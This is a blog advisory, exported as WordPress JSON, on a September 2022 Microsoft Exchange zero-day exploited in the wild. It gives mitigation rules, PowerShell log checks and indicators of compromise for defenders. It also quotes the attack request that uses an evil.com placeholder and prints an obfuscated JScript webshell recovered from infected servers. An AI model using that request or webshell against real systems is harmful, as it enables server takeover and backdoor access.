{"id":26729,"date":"2022-09-30T01:59:57","date_gmt":"2022-09-29T23:59:57","guid":{"rendered":"http:\/\/159.69.82.204\/win\/?p=26729"},"modified":"2022-11-16T19:55:08","modified_gmt":"2022-11-16T18:55:08","slug":"exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022","status":"publish","type":"post","link":"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/","title":{"rendered":"Exchange Server servers attacked via 0-day exploit (Sept. 29, 2022)"},"content":{"rendered":"<p><img decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline; border-width: 0px;\" title=\"Exchange Logo\" src=\"https:\/\/www.borncity.com\/blog\/wp-content\/uploads\/2022\/06\/Exchange.jpg\" alt=\"Exchange Logo\" align=\"left\" border=\"0\" \/>[<a href=\"https:\/\/www.borncity.com\/blog\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\" target=\"_blank\" rel=\"noopener\">German<\/a>]There are reports that a new zero-day exists in Microsoft Exchange that is being actively exploited in the wild. Security researchers confirm that some installations &#8211; including a honeypot &#8211; are already infected. Details about the zero-day are not yet available. Here's an overview of what I know so far and what, if anything, can be done to detect attacks.<\/p>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg05.met.vgwort.de\/na\/48dc444a2df048b185f5d1621fdbd5db\" alt=\"\" width=\"1\" height=\"1\" \/>I came across the facts a few minutes ago via <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">Twitter<\/a>. Security researcher Kevin Beaumont warns of a potential threat to Exchange servers from a zero-day exploit. At the same time, an email from blog reader Marco D. arrived (thanks for that), informing me about the issue as follows:<\/p>\n<blockquote><p>I just discovered this on <a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\">Twitter<\/a>, a zero day exploit for Exchange:<\/p><\/blockquote>\n<p><a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchange 0day exploit in wild\" src=\"https:\/\/i.imgur.com\/NMXrZy7.png\" alt=\"Exchange 0day exploit in wild\" \/><\/a><\/p>\n<blockquote><p>I don't know the linked Vietnamese site, but the content seemed conclusive, especially since the ZDI entries exist as well.<\/p><\/blockquote>\n<h2>First report from GTSC<\/h2>\n<p>The article WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER\u00a0 by an author from Vietnam seems to be the first source describing the problem. The security team at Vietnamese cybersecurity firm GTSC discovered in early August 2022 that a critical infrastructure had been attacked as part of security monitoring and incident response activities. Microsoft Exchange servers of the organizations in question were affected.<\/p>\n<p>During the investigation, GTSC's Blue Team experts determined that the attack exploited an undisclosed Exchange vulnerability, i.e., a 0-day vulnerability. The team immediately created a countermeasure plan to stop the attacks. At the same time, the GTSC Red teams began examining and debugging Exchange's decompiled code to find the vulnerability and exploit code.<\/p>\n<p>A previously unknown vulnerability (zero-day) was found that proved to be critical enough to allow attackers to perform remote code execution (RCE) on the compromised target system. GTSC immediately reported the vulnerability to the Zero Day Initiative (ZDI) to work with Microsoft. The goal was to create a patch as quickly as possible. The Zero Day Initiative (ZDI) verified and confirmed 2 flaws with CVSS scores 8.8 and 6.3 related to the exploit.<\/p>\n<ul>\n<li>ZDI-CAN-18333 CVSS 8.8<\/li>\n<li>ZDI-CAN-18802 CVSS 6.3<\/li>\n<\/ul>\n<p>GTSC security researchers found that other customers were also affected by a similar problem. After testing, it could be confirmed that these systems were attacked via this 0-day vulnerability.<\/p>\n<h2>Security researchers confirm the attacks<\/h2>\n<p>I was struck by the <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">tweets<\/a> of security researcher Kevin Beaumont, who confirmed on Twitter that some installations &#8211; including a honeypot &#8211; were already infected.<\/p>\n<p><a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchang 0-day (Sept 2022)\" src=\"https:\/\/i.imgur.com\/cjgycAG.png\" alt=\"Exchang 0-day (Sept 2022)\" \/><\/a><\/p>\n<p>So far, there is no patch to close the vulnerability from Microsoft &#8211; and it doesn't look like Microsoft has informed customers about the problem either.<\/p>\n<h2>Details of the attack<\/h2>\n<p>While providing Security Operations Center (SOC) services to a customer, the GTSC Blueteam discovered exploit requests in IIS logs with the same format as the long-known ProxyShell vulnerability. Kevin Beaumont writes here that the attackers pretend to be an Exchange EWS to set up a backdoor. The attack is done via the following request:<\/p>\n<pre><code>autodiscover\/autodiscover.json?@evil.com\/&lt;Exchange-backend-endpoint&gt;&amp;Email=autodiscover\/autodiscover.json%3f@evil.com<\/code><\/pre>\n<p>The link above is used to access a component in the backend where the remote code exploit (RCE) could then be implemented. According to GTSC, the attackers make use of various techniques to insert backdoors into the affected Exchange system and then move laterally on the network to other servers in the system.<\/p>\n<p>During the investigation, the security researchers discovered webshells, most of which were created hidden on the infected Exchange servers. Based on the user agent, the GTSC team was able to determine that the attacker was using Antsword. This is an active cross-platform open-source website management tool used by China's hackers to help manage webshells. Here is a JScript about it:<\/p>\n<pre>&lt;%@Page Language=\"Jscript\"%&gt;\r\n&lt;%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'\r\n+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+\r\nSystem.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))\r\n+char(51450\/525)+''+''+char(0640-0462)+char(0x8c28\/0x1cc)+char(0212100\/01250)\r\n+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))\r\n+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'\r\n+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%&gt;<\/pre>\n<p>The security team suspects that these backdoors originated from a Chinese attack group because the webshell uses code page 936, a Microsoft character encoding for simplified Chinese. Another notable feature, security researchers said, is that the hacker also modified the contents of the <em>RedirSuiteServiceProxy.aspx<\/em> file for the webshell. <em>RedirSuiteServiceProxy.aspx<\/em> is a legitimate file name available on the Exchange server.<\/p>\n<table border=\"0\" width=\"640\" cellspacing=\"0\" cellpadding=\"2\">\n<tbody>\n<tr>\n<td valign=\"top\" width=\"192\"><strong>FileName<\/strong><\/td>\n<td valign=\"top\" width=\"448\"><strong>Path<\/strong><\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">RedirSuiteServiceProxy.aspx<\/td>\n<td valign=\"top\" width=\"448\">C:\\ProgramFiles\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">Xml.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\inetpub\\wwwroot\\aspnet_client<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">pxh4HG1v.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\ProgramFiles\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Although the exploit used attack techniques that were also used for the previously known ProxyShell vulnerability, the scan of the infected Exchange servers revealed that the latest Exchange update was already installed there. Thus, exploitation of the Proxyshell vulnerability was impossible. Blueteam analysts at GTSC confirm that this is a new 0-day RCE vulnerability. Details on how the attack was conducted and further findings of the analysis are disclosed here.<\/p>\n<h2>Workarounds to mitigate the vulnerability<\/h2>\n<p>In their article, the GTSC security researchers suggest measures to prevent exploitation of the 0-day vulnerability in fully patched Exchange servers. To block attack attempts, add a new URL rewrite rule in IIS Server:<\/p>\n<ul>\n<li>In <em>Autodiscover<\/em> at FrontEnd select tab <em>URL Rewrite<\/em>, select <em>Request Blocking<\/em><\/li>\n<li>Add string \"<em>.*autodiscover\\.json.*\\@.*Powershell.*<\/em>\" to the URL Path<\/li>\n<li>Set condition input to: Choose {REQUEST_URI}<\/li>\n<\/ul>\n<p>There are corresponding screenshots in the article. Security researchers recommend all organizations\/companies using Microsoft Exchange Server to apply the above temporary workarounds as soon as possible to prevent potential attacks.<\/p>\n<h2>Check for compromise<\/h2>\n<p>To check if an Exchange Server has already been affected by an attack, GTSC has published a guide and tool for scanning IIS log files (stored by default in the %SystemDrive%\\inetpub\\logs\\LogFiles folder):<\/p>\n<p><strong>Methode 1:<\/strong> Use the Powershell command:<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\.json.*\\@.*200'<\/code><\/pre>\n<p><strong>Addendum:<\/strong> On Facebook, a German administrator pointed out to me that he had to make some adjustments to the PowerShell command. Here are his comments:<\/p>\n<blockquote><p>Regarding the PS command to search the logfiles: I created my own logfile as a test with the appropriate pattern:<\/p>\n<p>'powershell.*autodiscover\\.json.*\\@.*200'<\/p>\n<p>on our 2016ner (German language) it doesn't find the pattern and therefore doesn't return any results and it looks like everything is fine.<\/p>\n<p>If you shorten the pattern to only 'powershell.*autodiscover' it also finds the results. Tested with PS x86 &amp; x64.<\/p><\/blockquote>\n<p>and then added:<\/p>\n<blockquote><p>I just played around a bit. At the end of the PS-command there must be a \"-SimpleMatch\" otherwise it recognizes the first \"\\\" in the pattern as a regular expression, so it doesn't recognize the pattern correctly and returns no results.<\/p>\n<p>Otherwise you can replace the two \"\\\" with two \"\\\" and the backslash will be recognized as an actual backslash.<\/p><\/blockquote>\n<p>The following powershell command uses \\\\<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\\\.json.*\\\\@.*200'<\/code><\/pre>\n<p>works as a command for the administrator in question (see also the following screenshot).<\/p>\n<p><a href=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" alt=\"Check with PowerShell \" width=\"646\" height=\"109\" \/><\/a><br \/>\n<a href=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" target=\"_blank\" rel=\"noopener\">Click to zoom<\/a><\/p>\n<p><strong>Methode 2: <\/strong>Use the tool developed by the GTSC.<\/p>\n<p>Based on the exploit signature, the GTSC folks have created a tool that takes a much shorter search time than powershell. The tool can be downloaded from <a href=\"https:\/\/github.com\/ncsgroupvn\/NCSE0Scanner\" target=\"_blank\" rel=\"noopener\">GitHub<\/a>. In the article, the GTSC security researchers have also provided some Indicators of Compromise (IOCs) that can be used to identify an infection:<\/p>\n<p><strong>Webshell:<\/strong><\/p>\n<p><strong>File Name: <\/strong>pxh4HG1v.ashx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx<\/p>\n<p><strong>File Name:<\/strong> RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>File Name:<\/strong> <strong>RedirSuiteServiceProxy.aspx<\/strong><\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>File Name: <\/strong>Xml.ashx<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Hash (SHA256): <\/strong>c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1<\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Path: <\/strong>Xml.ashx<\/p>\n<p><strong>Filename<\/strong>: errorEE.aspx<\/p>\n<p><strong>SHA256<\/strong>: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257<\/p>\n<p><strong>Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx<\/p>\n<p><strong>DLL:<\/strong><\/p>\n<p><strong>File name:<\/strong> Dll.dll<\/p>\n<p><strong>SHA256:<\/strong><\/p>\n<p>074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82<\/p>\n<p>45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9<\/p>\n<p>9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0<\/p>\n<p>29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3<\/p>\n<p>c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2<\/p>\n<p><strong>File name<\/strong>: 180000000.dll (Dump t\u1eeb ti\u1ebfn tr\u00ecnh Svchost.exe)<\/p>\n<p><strong>SHA256<\/strong>: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e<\/p>\n<p><strong>IP:<\/strong><\/p>\n<p>125[.]212[.]220[.]48<\/p>\n<p>5[.]180[.]61[.]17<\/p>\n<p>47[.]242[.]39[.]92<\/p>\n<p>61[.]244[.]94[.]85<\/p>\n<p>86[.]48[.]6[.]69<\/p>\n<p>86[.]48[.]12[.]64<\/p>\n<p>94[.]140[.]8[.]48<\/p>\n<p>94[.]140[.]8[.]113<\/p>\n<p>103[.]9[.]76[.]208<\/p>\n<p>103[.]9[.]76[.]211<\/p>\n<p>104[.]244[.]79[.]6<\/p>\n<p>112[.]118[.]48[.]186<\/p>\n<p>122[.]155[.]174[.]188<\/p>\n<p>125[.]212[.]241[.]134<\/p>\n<p>185[.]220[.]101[.]182<\/p>\n<p>194[.]150[.]167[.]88<\/p>\n<p>212[.]119[.]34[.]11<\/p>\n<p><strong>URL:<\/strong><\/p>\n<p>hxxp:\/\/206[.]188[.]196[.]77:8080\/themes.aspx<\/p>\n<p><strong>C2:<\/strong><\/p>\n<p>137[.]184[.]67[.]33<\/p>\n<p><strong>Addendum:<\/strong> Microsoft has released some informations and recomendations to mitigate &#8211; see my follow up post\u00a0<a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/microsofts-empfehlungen-fr-die-exchange-server-0-day-schwachstelle-zdi-can-18333\/\" rel=\"bookmark\">Microsoft's recommendations for Exchange Server 0-day vulnerability ZDI-CAN-18333<\/a>.<\/p>\n<p><strong>Article series:<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\">Exchange Servers are attacked via 0-day exploit (Sept. 29, 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/microsofts-empfehlungen-fr-die-exchange-server-0-day-schwachstelle-zdi-can-18333\/\">Microsoft's recommendations for Exchange Server 0-day vulnerability ZDI-CAN-18333<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/10\/01\/neues-zur-exchange-server-0-day-schwachstelle-zdi-can-18333-korrekturen-scripte-und-ep-lsung\/\">Update on Exchange Server 0-day Vulnerability ZDI-CAN-18333: Fixes, Scripts and EMS Solution<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/10\/05\/exchange-server-microsofts-bessert-lsungen-fr-0-day-schutz-nach-5-oktober-2022\/\">Exchange Server: Microsoft updates it's mitigation for the 0-day ProxyNotShell vulnerability (October 5, 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/10\/11\/exchange-server-microsofts-bessert-lsungen-fr-0-day-schutz-nach-8-oktober-2022\/\">Exchange Server: Microsofts improves solutions for 0-day mitigation again (October 8, 2022)<\/a><\/p>\n<p><strong>Similar articles<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/08\/10\/exchange-server-sicherheitsupdates-9-august-2022\/\">Exchange Server Security updates (August 9, 2022)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/06\/30\/microsoft-exchange-server-remote-code-execution-schwachstelle-cve-2022-23277-trotz-patch-ausnutzbar\/\">Microsoft Exchange Server: Remote Code Execution vulnerability CVE-2022-23277 exploitable despite patch?<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/06\/17\/anatomie-eines-hive-ransomware-angriffs-auf-exchange-per-proxyshell\/\">Anatomy of a Hive Ransomware Attack on Exchange via ProxyShell<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/11\/23\/warnung-proxyshell-squirrelwaffle-und-ein-poc-eploit-patcht-endlich-eure-exchange-server\/\">ProxyShell, Squirrelwaffle and a new PoC Exploit, patch your Exchange Server!<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/26\/exchange-und-proxyshell-neues-von-microsoft-und-sicherheitsspezialisten\/\">Exchange and ProxyShell: News from Microsoft and security experts<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/25\/proxyshell-proxylogon-und-microsofts-exchange-doku-fr-ausnahmen-vom-virenschutz\/\">ProxyShell, ProxyLogon and Microsoft's contradictious Exchange doc for virus scan exceptions<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/22\/angriffswelle-fast-2-000-exchange-server-ber-proxyshell-gehackt\/\">Wave of attacks, almost 2,000 Exchange servers hacked via ProxyShell<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/13\/angriffe-auf-exchange-server-per-proxyshell-schwachstelle-rollen-an-13-8-2021\/\">Attacks on Exchange Server via ProxyShell vulnerability (8\/13\/2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/10\/exchange-server-neues-zu-den-proxyshell-schwachstellen\/\">Exchange Server: Update on ProxyShell vulnerabilities<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/03\/11\/probleme-mit-exchange-mrz-2022-updates\/\">Issues with Exchange March 2022 Updates<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/04\/16\/exchange-update-fehler-und-infos-13-april-2021\/\">Exchange Update errors and information (April 13, 2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/03\/06\/exchange-probleme-mit-ecp-nach-sicherheitsupdate-mrz-2021\/\">Exchange isues with ECP\/OWA search after installing security update (March 2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/07\/13\/exchange-2016-2019-outlook-probleme-durch-amsi-integration\/\">Exchange 2016\/2019: Outlook problems due to AMSI integration<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/09\/27\/exchange-server-september-2021-cu-kommt-zum-28-9-2021-mit-microsoft-exchange-emergency-mitigation-service\/\">Exchange Server September 2021 CU comes Sept. 28 with Microsoft Exchange Emergency Mitigation Service<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2021\/08\/29\/exchange-server-2016-2019-benutzerdefinierte-attribute-in-ecp-nach-cu-installation-juli-2021-nicht-mehr-aktualisierbar\/\">Exchange Server 2016-2019: Custom attributes in ECP no longer updatable after CU installation (July 2021)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/09\/01\/exchange-server-2013-tipps-von-microsoft-zur-auerbetriebnahme-der-systeme\/\">Exchange Server 2013: Microsoft's tips on decommissioning the systems<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/09\/16\/update-fr-exchange-extended-protection-script-aber-weiterhin-fehler\/\">Update for Exchange Extended Protection script, but still error<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-health-checker-script-erweiterungen-von-frank-zchling\/\">Tip: Exchange Health Checker \u2013 Script extensions by Frank Z\u00f6chling<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[German]There are reports that a new zero-day exists in Microsoft Exchange that is being actively exploited in the wild. Security researchers confirm that some installations &#8211; including a honeypot &#8211; are already infected. Details about the zero-day are not yet &hellip; <a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[580,1547],"tags":[869,69],"class_list":["post-26729","post","type-post","status-publish","format-standard","hentry","category-security","category-software","tag-exchange","tag-security"],"_links":{"self":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/26729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/comments?post=26729"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/26729\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/media?parent=26729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/categories?post=26729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/tags?post=26729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}